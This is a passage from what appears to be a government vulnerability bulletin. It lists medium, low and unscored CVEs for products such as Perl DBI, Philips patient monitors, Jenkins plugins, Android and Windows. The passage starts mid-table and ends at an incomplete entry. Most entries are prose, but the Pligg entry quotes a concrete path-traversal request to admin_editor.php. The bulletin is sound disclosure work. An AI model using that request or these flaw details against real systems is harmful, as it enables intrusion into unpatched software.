    perl -- dbi An issue was discovered in the DBI module before 1.643 for Perl. The hv_fetch() documentation requires checking for NULL and the code does that. But, shortly thereafter, it calls SvOK(profile), causing a NULL pointer dereference. 2020-09-17 5 CVE-2019-20919
    MISC
    MISC
    philips -- patient_information_center_ix Patient Information Center iX (PICiX) Versions B.02, C.02, C.03, PerformanceBridge Focal Point Version A.01, IntelliVue patient monitors MX100, MX400-MX850, and MP2-MP90 Versions N and prior, IntelliVue X3 and X2 Versions N and prior. The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource. The application on the surveillance station operates in kiosk mode, which is vulnerable to local breakouts that could allow an attacker with physical access to escape the restricted environment with limited privileges. 2020-09-11 4.6 CVE-2020-16212
    MISC
    philips -- patient_information_center_ix Patient Information Center iX (PICiX) Versions B.02, C.02, C.03, PerformanceBridge Focal Point Version A.01, IntelliVue patient monitors MX100, MX400-MX850, and MP2-MP90 Versions N and prior, IntelliVue X3 and X2 Versions N and prior. The software does not check or incorrectly checks the revocation status of a certificate, which may cause it to use a compromised certificate. 2020-09-11 5.2 CVE-2020-16228
    MISC
    philips -- patient_information_center_ix Patient Information Center iX (PICiX) Versions B.02, C.02, C.03, PerformanceBridge Focal Point Version A.01, IntelliVue patient monitors MX100, MX400-MX850, and MP2-MP90 Versions N and prior, IntelliVue X3 and X2 Versions N and prior. When an actor claims to have a given identity, the software does not prove or insufficiently proves the claim is correct. 2020-09-11 5.8 CVE-2020-16222
    MISC
    philips -- patient_information_center_ix Patient Information Center iX (PICiX) Versions B.02, C.02, C.03, PerformanceBridge Focal Point Version A.01, IntelliVue patient monitors MX100, MX400-MX850, and MP2-MP90 Versions N and prior, IntelliVue X3 and X2 Versions N and prior. The software saves user-provided information into a comma-separated value (CSV) file, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as a command when the file is opened by spreadsheet software. 2020-09-11 5.8 CVE-2020-16214
    MISC
    philips -- patient_information_center_ix Patient Information Center iX (PICiX) Versions B.02, C.02, C.03, PerformanceBridge Focal Point Version A.01, IntelliVue patient monitors MX100, MX400-MX850, and MP2-MP90 Versions N and prior, IntelliVue X3 and X2 Versions N and prior. The product receives input or data but does not validate or incorrectly validates that the input has the properties required to process the data safely and correctly, which can induce a denial-of-service condition through a system restart. 2020-09-11 6.1 CVE-2020-16216
    MISC
    pligg_project -- pligg Pligg 2.0.3 allows remote authenticated users to execute arbitrary commands because the template editor can edit any file, as demonstrated by an admin/admin_editor.php the_file=..%2Findex.php&open=Open request. 2020-09-13 6.5 CVE-2020-25287
    MISC
    primekey -- ejbca An issue was discovered in PrimeKey EJBCA 6.x and 7.x before 7.4.1. When using a client certificate to enroll over the EST protocol, no revocation check is performed on that certificate. This vulnerability can only affect a system that has EST configured, uses client certificates to authenticate enrollment, and has had such a certificate revoked. This certificate needs to belong to a role that is authorized to enroll new end entities. (To completely mitigate this problem prior to upgrade, remove any revoked client certificates from their respective roles.) 2020-09-11 6.8 CVE-2020-25276
    MISC
    qnap -- helpdesk The vulnerability have been reported to affect earlier versions of Helpdesk. If exploited, this information exposure vulnerability could disclose sensitive information. QNAP has already fixed the issue in Helpdesk 3.0.3 and later. 2020-09-11 4 CVE-2018-19947
    MISC
    qnap -- helpdesk The vulnerability have been reported to affect earlier versions of Helpdesk. If exploited, this cross-site request forgery (CSRF) vulnerability could allow attackers to force NAS users to execute unintentional actions through a web application. QNAP has already fixed the issue in Helpdesk 3.0.3 and later. 2020-09-11 4.3 CVE-2018-19948
    MISC
    qnap -- helpdesk The vulnerability have been reported to affect earlier versions of Helpdesk. If exploited, this improper certificate validation vulnerability could allow an attacker to spoof a trusted entity by interfering in the communication path between the host and client. QNAP has already fixed the issue in Helpdesk 3.0.3 and later. 2020-09-11 4.3 CVE-2018-19946
    MISC
    rails -- action_view In Action View before versions 5.2.4.4 and 6.0.3.3 there is a potential Cross-Site Scripting (XSS) vulnerability in Action View's translation helpers. Views that allow the user to control the default (not found) value of the `t` and `translate` helpers could be susceptible to XSS attacks. When an HTML-unsafe string is passed as the default for a missing translation key named html or ending in _html, the default string is incorrectly marked as HTML-safe and not escaped. This is patched in versions 6.0.3.3 and 5.2.4.4. A workaround without upgrading is proposed in the source advisory. 2020-09-11 4.3 CVE-2020-15169
    CONFIRM
    recall-products_project -- recall-products Wordpress Plugin Store / Mike Rooijackers Recall Products V0.8 fails to sanitize input from the 'Manufacturer[]' parameter which allows an authenticated attacker to inject a malicious SQL query. 2020-09-14 6.5 CVE-2020-25379
    MISC
    rukovoditel -- rukovoditel Rukovoditel Project Management app 2.6 is affected by: Cross Site Scripting (XSS). An attacker can add JavaScript code to the filename. 2020-09-14 4.3 CVE-2020-21732
    MISC
    MISC
    MISC
    sagemcom -- f\@st_3686_firmware Sagemcom F@ST3686 v1.0 HUN 3.97.0 has XSS via RgDiagnostics.asp, RgDdns.asp, RgFirewallEL.asp, RgVpnL2tpPptp.asp. 2020-09-14 4.3 CVE-2020-21733
    MISC
    MISC
    MISC
    MISC
    spiceworks -- spiceworks Spiceworks Version <= 7.5.00107 is affected by CSRF which can lead to privilege escalation via "/settings/v1/users" function. 2020-09-15 6.8 CVE-2020-23451
    MISC
    MISC
    taoensso -- nippy A deserialization flaw is present in Taoensso Nippy before 2.14.2. In some circumstances, it is possible for an attacker to create a malicious payload that, when deserialized, will allow arbitrary code to be executed. This occurs because there is automatic use of the Java Serializable interface. 2020-09-11 6.8 CVE-2020-24164
    MISC
    vtenext -- vtenext A file upload vulnerability in vtecrm vtenext 19 CE allows authenticated users to upload files with a .pht extension, resulting in remote code execution. 2020-09-14 6.5 CVE-2020-10228
    MISC
    MISC
    MISC
    vtenext -- vtenext A cross-site scripting (XSS) vulnerability in the messages module of vtecrm vtenext 19 CE allows attackers to inject arbitrary JavaScript code via the From field of an email. 2020-09-14 4.3 CVE-2020-10227
    MISC
    MISC
    MISC
    vtenext -- vtenext A CSRF issue in vtecrm vtenext 19 CE allows attackers to carry out unwanted actions on an administrator's behalf, such as uploading files, adding users, and deleting accounts. 2020-09-14 6.8 CVE-2020-10229
    MISC
    MISC
    MISC
    wibu -- codemeter An attacker could send a specially crafted packet that could have CodeMeter (All versions prior to 7.10) send back packets containing data from the heap. 2020-09-16 5 CVE-2020-16233
    MISC
    wordpress -- wordpress In wp-includes/comment-template.php in WordPress before 5.4.2, comments from a post or page could sometimes be seen in the latest comments even if the post or page was not public. 2020-09-13 5 CVE-2020-25286
    MISC
    MISC
    x.org -- libx11 An integer overflow vulnerability leading to a double-free was found in libX11. This flaw allows a local privileged attacker to cause an application compiled with libX11 to crash, or in some cases, result in arbitrary code execution. The highest threat from this flaw is to confidentiality, integrity as well as system availability. 2020-09-11 4.6 CVE-2020-14363
    CONFIRM
    MISC
    UBUNTU
    x.org -- xorg-server A flaw was found in xorg-x11-server before 1.20.9. An integer underflow in the X input extension protocol decoding in the X server may lead to arbitrary access of memory contents. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. 2020-09-15 4.6 CVE-2020-14346
    MISC
    MISC
    UBUNTU
    x.org -- xorg-server A flaw was found in X.Org Server before xorg-x11-server 1.20.9. An Integer underflow leading to heap-buffer overflow may lead to a privilege escalation vulnerability. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. 2020-09-15 4.6 CVE-2020-14362
    MISC
    MISC
    UBUNTU
    x.org -- xorg-server A flaw was found in X.Org Server before xorg-x11-server 1.20.9. An Integer underflow leading to heap-buffer overflow may lead to a privilege escalation vulnerability. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. 2020-09-15 4.6 CVE-2020-14361
    MISC
    MISC
    UBUNTU
    zeromq -- libzmq In ZeroMQ before version 4.3.3, there is a denial-of-service vulnerability. Users with TCP transport public endpoints, even with CURVE/ZAP enabled, are impacted. If a raw TCP socket is opened and connected to an endpoint that is fully configured with CURVE/ZAP, legitimate clients will not be able to exchange any message. Handshakes complete successfully, and messages are delivered to the library, but the server application never receives them. This is patched in version 4.3.3. 2020-09-11 5 CVE-2020-15166
    MISC
    MISC
    CONFIRM
    GENTOO
    Back to top

     

    Low Vulnerabilities

    Primary
    Vendor -- Product
    Description Published CVSS Score Source & Patch Info
    avast -- secureline_vpn The VPN service in AVAST SecureLine before 5.6.4982.470 allows local users to write to arbitrary files via an Object Manager symbolic link from the log directory (which has weak permissions). 2020-09-13 2.1 CVE-2020-25289
    MISC
    canonical -- ubuntu-ui-toolkit On desktop, Ubuntu UI Toolkit's StateSaver would serialise data on tmp/ files which an attacker could use to expose potentially sensitive data. StateSaver would also open files without the O_EXCL flag. An attacker could exploit this to launch a symlink attack, though this is partially mitigated by symlink and hardlink restrictions in Ubuntu. Fixed in 1.1.1188+14.10.20140813.4-0ubuntu1. 2020-09-11 2.1 CVE-2014-1420
    UBUNTU
    UBUNTU
    elementor -- elementor_page_builder A stored XSS vulnerability exists in the Custom Link Attributes control Affect function in Elementor Page Builder 2.9.2 and earlier versions. It is caused by inadequate filtering on the link custom attributes. 2020-09-16 3.5 CVE-2020-20406
    MISC
    elkarbackup -- elkarbackup A Persistent Cross-site Scripting vulnerability is found in ElkarBackup v1.3.3, where an attacker can steal the user session cookie using this vulnerability present on Policies >> action >> Name Parameter 2020-09-15 3.5 CVE-2020-24924
    MISC
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. GitLab was vulnerable to a stored XSS on the standalone vulnerability page. 2020-09-14 3.5 CVE-2020-13301
    CONFIRM
    MISC
    MISC
    google -- android In Settings, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-151645695 2020-09-18 2.1 CVE-2020-0304
    MISC
    google -- android In NFC, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-139188779 2020-09-18 2.1 CVE-2020-0349
    MISC
    google -- android In NFC, there is a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-145079309 2020-09-18 2.1 CVE-2020-0325
    MISC
    google -- android In Settings, there is a possible permissions bypass. This could lead to local information disclosure of the device's IMEI with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-147309310 2020-09-18 2.1 CVE-2020-0331
    MISC
    google -- android In Telephony, there is a missing permission check. This could lead to local information disclosure of radio data with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-154934919 2020-09-18 2.1 CVE-2020-0316
    MISC
    google -- android In the Accessibility service, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-154913130 2020-09-18 2.1 CVE-2020-0263
    MISC
    google -- android In Zen Mode, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-155642026 2020-09-18 2.1 CVE-2020-0315
    MISC
    google -- android In NotificationManagerService, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-154917989 2020-09-18 2.1 CVE-2020-0313
    MISC
    google -- android In InputManagerService, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-153878642 2020-09-18 2.1 CVE-2020-0311
    MISC
    google -- android In Settings, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-153356468 2020-09-18 2.1 CVE-2020-0310
    MISC
    google -- android In Settings, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-151645867 2020-09-18 2.1 CVE-2020-0307
    MISC
    google -- android In Settings, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-151646375 2020-09-18 2.1 CVE-2020-0302
    MISC
    google -- android In libhwbinder, there is a possible information disclosure due to uninitialized data. This could lead to local information disclosure with System execution privileges required. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-130166487 2020-09-18 2.1 CVE-2020-0272
    MISC
    google -- android In Telecom, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-155650969 2020-09-18 2.1 CVE-2020-0295
    MISC
    google -- android In core networking, there is a missing permission check. This could lead to local information disclosure of app network usage with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-129151407 2020-09-18 2.1 CVE-2020-0327
    MISC
    google -- android In Telephony, there are possible leaks of sensitive data due to missing permission checks. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-150155839 2020-09-18 2.1 CVE-2020-0265
    MISC
    google -- android In Android Auto Settings, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-151645626 2020-09-18 2.1 CVE-2020-0269
    MISC
    google -- android In Bluetooth, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges and a compromised Firmware needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-146032016 2020-09-18 2.1 CVE-2020-0291
    MISC
    google -- android In Telephony, there is a possible permission bypass due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-156253586 2020-09-18 2.1 CVE-2020-0276
    MISC
    google -- android In Telephony, there is a possible permission bypass due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-156253784 2020-09-18 2.1 CVE-2020-0284
    MISC
    google -- android In Telephony, there is a possible permission bypass due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-156253479 2020-09-18 2.1 CVE-2020-0285
    MISC
    google -- android In the wallpaper manager, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-154915372 2020-09-18 2.1 CVE-2020-0294
    MISC
    google -- android In Bluetooth, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges and a compromised Firmware needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-110107252 2020-09-18 2.1 CVE-2020-0292
    MISC
    huawei -- bla-a09_firmware Huawei smartphones BLA-A09 versions 8.0.0.123(C212),versions earlier than 8.0.0.123(C567),versions earlier than 8.0.0.123(C797);BLA-TL00B versions earlier than 8.1.0.326(C01);Berkeley-L09 versions earlier than 8.0.0.163(C10),versions earlier than 8.0.0.163(C432),Versions earlier than 8.0.0.163(C636),Versions earlier than 8.0.0.172(C10);Duke-L09 versions Duke-L09C10B187, versions Duke-L09C432B189, versions Duke-L09C636B189;HUAWEI P20 versions earlier than 8.0.1.16(C00);HUAWEI P20 Pro versions earlier than 8.1.0.152(C00);Jimmy-AL00A versions earlier than Jimmy-AL00AC00B172;LON-L29D versions LON-L29DC721B192;NEO-AL00D versions earlier than 8.1.0.172(C786);Stanford-AL00 versions Stanford-AL00C00B123;Toronto-AL00 versions earlier than Toronto-AL00AC00B225;Toronto-AL00A versions earlier than Toronto-AL00AC00B225;Toronto-TL10 versions earlier than Toronto-TL10C01B225 have an information vulnerability. A module has a design error that is lack of control of input. Attackers can exploit this vulnerab 2020-09-11 2.1 CVE-2020-9239
    MISC
    ibm -- business_automation_workflow IBM Business Automation Workflow C.D.0 and IBM Business Process Manager 8.0, 8.5, and 8.6 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-ForceID: 182714. 2020-09-15 3.5 CVE-2020-4530
    XF
    CONFIRM
    ibm -- tivoli_business_service_manager IBM Tivoli Business Service Manager 6.2.0.0 - 6.2.0.2 IF 1 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 178247. 2020-09-15 2.1 CVE-2020-4344
    XF
    CONFIRM
    jenkins -- android_lint Jenkins Android Lint Plugin 2.6 and earlier does not escape the annotation message in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to provide report files to the plugin's post-build step. 2020-09-16 3.5 CVE-2020-2262
    MLIST
    CONFIRM
    jenkins -- blue_ocean Jenkins Blue Ocean Plugin 1.23.2 and earlier provides an undocumented feature flag that, when enabled, allows an attacker with Job/Configure or Job/Create permission to read arbitrary files on the Jenkins controller file system. 2020-09-16 3.5 CVE-2020-2254
    MLIST
    CONFIRM
    jenkins -- chosen-views-tabbar Jenkins chosen-views-tabbar Plugin 1.2 and earlier does not escape view names in the dropdown to select views, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with the ability to configure views. 2020-09-16 3.5 CVE-2020-2269
    MLIST
    CONFIRM
    jenkins -- clearcase_release Jenkins ClearCase Release Plugin 0.3 and earlier does not escape the composite baseline in badge tooltip, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission. 2020-09-16 3.5 CVE-2020-2270
    MLIST
    CONFIRM
    jenkins -- computer_queue Jenkins computer-queue-plugin Plugin 1.5 and earlier does not escape the agent name in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Agent/Configure permission. 2020-09-16 3.5 CVE-2020-2259
    MLIST
    CONFIRM
    jenkins -- coverage\/complexity_scatter_plot Jenkins Coverage/Complexity Scatter Plot Plugin 1.1.1 and earlier does not escape the method information in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to provide report files to the plugin's post-build step. 2020-09-16 3.5 CVE-2020-2265
    MLIST
    CONFIRM
    jenkins -- custom_job_icon Jenkins Custom Job Icon Plugin 0.2 and earlier does not escape the job descriptions in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission. 2020-09-16 3.5 CVE-2020-2264
    MLIST
    CONFIRM
    jenkins -- description_column Jenkins Description Column Plugin 1.3 and earlier does not escape the job description in the column tooltip, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission. 2020-09-16 3.5 CVE-2020-2266
    MLIST
    CONFIRM
    jenkins -- elastest Jenkins ElasTest Plugin 1.2.1 and earlier stores its server password unencrypted in its global configuration file on the Jenkins controller where it can be viewed by users with access to the Jenkins controller file system. 2020-09-16 2.1 CVE-2020-2274
    MLIST
    CONFIRM
    jenkins -- locked_files_report Jenkins Locked Files Report Plugin 1.6 and earlier does not escape locked files' names in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission. 2020-09-16 3.5 CVE-2020-2271
    MLIST
    CONFIRM
    jenkins -- pipeline_maven_integration Jenkins Pipeline Maven Integration Plugin 3.9.2 and earlier does not escape the upstream job's display name shown as part of a build cause, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission. 2020-09-16 3.5 CVE-2020-2256
    MLIST
    CONFIRM
    jenkins -- radiator_view Jenkins Radiator View Plugin 1.29 and earlier does not escape the full name of the jobs in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission. 2020-09-16 3.5 CVE-2020-2263
    MLIST
    CONFIRM
    jenkins -- validating_string_parameter Jenkins Validating String Parameter Plugin 2.4 and earlier does not escape various user-controlled fields, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission. 2020-09-16 3.5 CVE-2020-2257
    MLIST
    CONFIRM
    kaiostech -- kaios An issue was discovered in KaiOS 1.0, 2.5, and 2.5.1. The pre-installed Radio application is vulnerable to HTML and JavaScript injection attacks. A local attacker can inject arbitrary HTML into the Radio application. At a bare minimum, this allows an attacker to take control over the Radio application's UI (e.g., display a malicious prompt to the user asking them to re-enter credentials such as their KaiOS credentials to continue using the application) and also allows an attacker to abuse any of the privileges available to the mobile application. 2020-09-14 1.9 CVE-2019-14759
    MISC
    kaiostech -- kaios An issue was discovered in KaiOS 2.5. The pre-installed Recorder application is vulnerable to HTML and JavaScript injection attacks. A local attacker can inject arbitrary HTML into the Recorder application. At a bare minimum, this allows an attacker to take control over the Recorder application's UI (e.g., display a malicious prompt to the user asking them to re-enter credentials such as their KaiOS credentials to continue using the application) and also allows an attacker to abuse any of the privileges available to the mobile application. 2020-09-14 1.9 CVE-2019-14760
    MISC
    MISC
    kaiostech -- kaios An issue was discovered in KaiOS 2.5. The pre-installed Note application is vulnerable to HTML and JavaScript injection attacks. A local attacker can inject arbitrary HTML into the Note application. At a bare minimum, this allows an attacker to take control over the Note application's UI (e.g., display a malicious prompt to the user asking them to re-enter credentials such as their KaiOS credentials to continue using the application) and also allows an attacker to abuse any of the privileges available to the mobile application. 2020-09-14 1.9 CVE-2019-14761
    MISC
    MISC
    linux -- linux_kernel The rbd block device driver in drivers/block/rbd.c in the Linux kernel through 5.8.9 used incomplete permission checking for access to rbd devices, which could be leveraged by local attackers to map or unmap rbd block devices, aka CID-f44d04e696fe. 2020-09-13 2.1 CVE-2020-25284
    MISC
    MISC
    mcafee -- web_gateway Privilege Escalation vulnerability in McAfee Web Gateway (MWG) prior to 9.2.1 allows authenticated user interface user to access protected dashboard data via improper access control in the user interface. 2020-09-16 2.7 CVE-2020-7297
    MISC
    mcafee -- web_gateway Privilege Escalation vulnerability in McAfee Web Gateway (MWG) prior to 9.2.1 allows authenticated user interface user to access protected configuration files via improper access control in the user interface. 2020-09-15 2.7 CVE-2020-7296
    CONFIRM
    microsoft -- onedrive An elevation of privilege vulnerability exists when the OneDrive for Windows Desktop application improperly handles symbolic links, aka 'OneDrive for Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16851, CVE-2020-16853. 2020-09-11 3.6 CVE-2020-16852
    N/A
    microsoft -- onedrive An elevation of privilege vulnerability exists when the OneDrive for Windows Desktop application improperly handles symbolic links, aka 'OneDrive for Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16851, CVE-2020-16852. 2020-09-11 3.6 CVE-2020-16853
    N/A
    microsoft -- onedrive An elevation of privilege vulnerability exists when the OneDrive for Windows Desktop application improperly handles symbolic links, aka 'OneDrive for Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16852, CVE-2020-16853. 2020-09-11 3.6 CVE-2020-16851
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Information Disclosure Vulnerability'. 2020-09-11 2.1 CVE-2020-0914
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when the win32k component improperly provides kernel information, aka 'Win32k Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0941. 2020-09-11 2.1 CVE-2020-1250
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when the win32k component improperly provides kernel information, aka 'Win32k Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-1250. 2020-09-11 2.1 CVE-2020-0941
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when Windows Mobile Device Management (MDM) Diagnostics improperly handles junctions, aka 'Windows Mobile Device Management Diagnostics Information Disclosure Vulnerability'. 2020-09-11 2.1 CVE-2020-0989
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory, aka 'Windows Kernel Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0928, CVE-2020-1589, CVE-2020-1592, CVE-2020-16854. 2020-09-11 2.1 CVE-2020-1033
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory, aka 'Microsoft Graphics Component Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0921. 2020-09-11 2.1 CVE-2020-1083
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when StartTileData.dll improperly handles objects in memory, aka 'Windows Information Disclosure Vulnerability'. 2020-09-11 2.1 CVE-2020-1119
    N/A
    microsoft -- windows_10 A denial of service vulnerability exists when Microsoft Hyper-V on a host server fails to properly validate specific malicious data from a user on a guest operating system.To exploit the vulnerability, an attacker who already has a privileged account on a guest operating system, running as a virtual machine, could run a specially crafted application.The security update addresses the vulnerability by resolving the conditions where Hyper-V would fail to handle these requests., aka 'Windows Hyper-V Denial of Service Vulnerability'. This CVE ID is unique from CVE-2020-0890. 2020-09-11 2.1 CVE-2020-0904
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.To exploit this vulnerability, an authenticated attacker could run a specially crafted application, aka 'Windows Kernel Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0928, CVE-2020-1033, CVE-2020-1589, CVE-2020-16854. 2020-09-11 2.1 CVE-2020-1592
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory, aka 'Windows Kernel Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-1033, CVE-2020-1589, CVE-2020-1592, CVE-2020-16854. 2020-09-11 2.1 CVE-2020-0928
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory, aka 'Windows Kernel Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0928, CVE-2020-1033, CVE-2020-1589, CVE-2020-1592. 2020-09-11 2.1 CVE-2020-16854
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when a Windows Projected Filesystem improperly handles file redirections, aka 'Projected Filesystem Information Disclosure Vulnerability'. 2020-09-11 2.1 CVE-2020-16879
    N/A
    microsoft -- windows_10 A security feature bypass vulnerability exists when a Windows Projected Filesystem improperly handles file redirections, aka 'Projected Filesystem Security Feature Bypass Vulnerability'. 2020-09-11 2.1 CVE-2020-0805
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory, aka 'Windows Kernel Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0928, CVE-2020-1033, CVE-2020-1592, CVE-2020-16854. 2020-09-11 2.1 CVE-2020-1589
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory, aka 'Microsoft Graphics Component Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-1083. 2020-09-11 2.1 CVE-2020-0921
    N/A
    philips -- patient_information_center_ix Patient Information Center iX (PICiX) Versions B.02, C.02, C.03, PerformanceBridge Focal Point Version A.01, IntelliVue patient monitors MX100, MX400-MX850, and MP2-MP90 Versions N and prior, IntelliVue X3 and X2 Versions N and prior. The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is then used as a webpage and served to other users. Successful exploitation could lead to unauthorized access to patient data via a read-only web application. 2020-09-11 2.7 CVE-2020-16218
    MISC
    philips -- patient_information_center_ix Patient Information Center iX (PICiX) Versions B.02, C.02, C.03, PerformanceBridge Focal Point Version A.01, IntelliVue patient monitors MX100, MX400-MX850, and MP2-MP90 Versions N and prior, IntelliVue X3 and X2 Versions N and prior. The software parses a formatted message or structure but does not handle or incorrectly handles a length field that is inconsistent with the actual length of the associated data, causing the application on the surveillance station to restart. 2020-09-11 3.3 CVE-2020-16224
    MISC
    philips -- patient_information_center_ix Patient Information Center iX (PICiX) Versions B.02, C.02, C.03, PerformanceBridge Focal Point Version A.01, IntelliVue patient monitors MX100, MX400-MX850, and MP2-MP90 Versions N and prior, IntelliVue X3 and X2 Versions N and prior. The product receives input that is expected to be well-formed (i.e., to comply with a certain syntax) but it does not validate or incorrectly validates that the input complies with the syntax, causing the certificate enrollment service to crash. It does not impact monitoring but prevents new devices from enrolling. 2020-09-11 3.3 CVE-2020-16220
    MISC
    recall-products_project -- recall-products Wordpress Plugin Store / Mike Rooijackers Recall Products V0.8 is affected by: Cross Site Scripting (XSS) via the 'Recall Settings' field in admin.php. An attacker can inject JavaScript code that will be stored and executed. 2020-09-14 3.5 CVE-2020-25380
    MISC
    redhat -- ansible_engine An Improper Output Neutralization for Logs flaw was found in Ansible when using the uri module, where sensitive data is exposed to content and json output. This flaw allows an attacker to access the logs or outputs of performed tasks to read keys used in playbooks from other users within the uri module. The highest threat from this vulnerability is to data confidentiality. 2020-09-11 2.1 CVE-2020-14330
    CONFIRM
    MISC
    softrade -- wp_smart_crm_\&_invoices Wordpress Plugin Store / SoftradeWeb SNC WP SMART CRM V1.8.7 is affected by: Cross Site Scripting via the Business Name field, Tax Code field, First Name field, Address field, Town field, Phone field, Mobile field, Place of Birth field, Web Site field, VAT Number field, Last Name field, Fax field, Email field, and Skype field. 2020-09-14 3.5 CVE-2020-25375
    MISC
    Back to top

     

    Severity Not Yet Assigned

    Primary
    Vendor -- Product
    Description Published CVSS Score Source & Patch Info
    1crm -- 1crm_system
     
    An issue was discovered in 1CRM System through 8.6.7. An insecure direct object reference to internally stored files allows a remote attacker to access various sensitive information via an unauthenticated request with a predictable URL. 2020-09-18 not yet calculated CVE-2020-15958
    MISC
    MISC
    MISC
    MISC
    adobe -- media_encoder
     
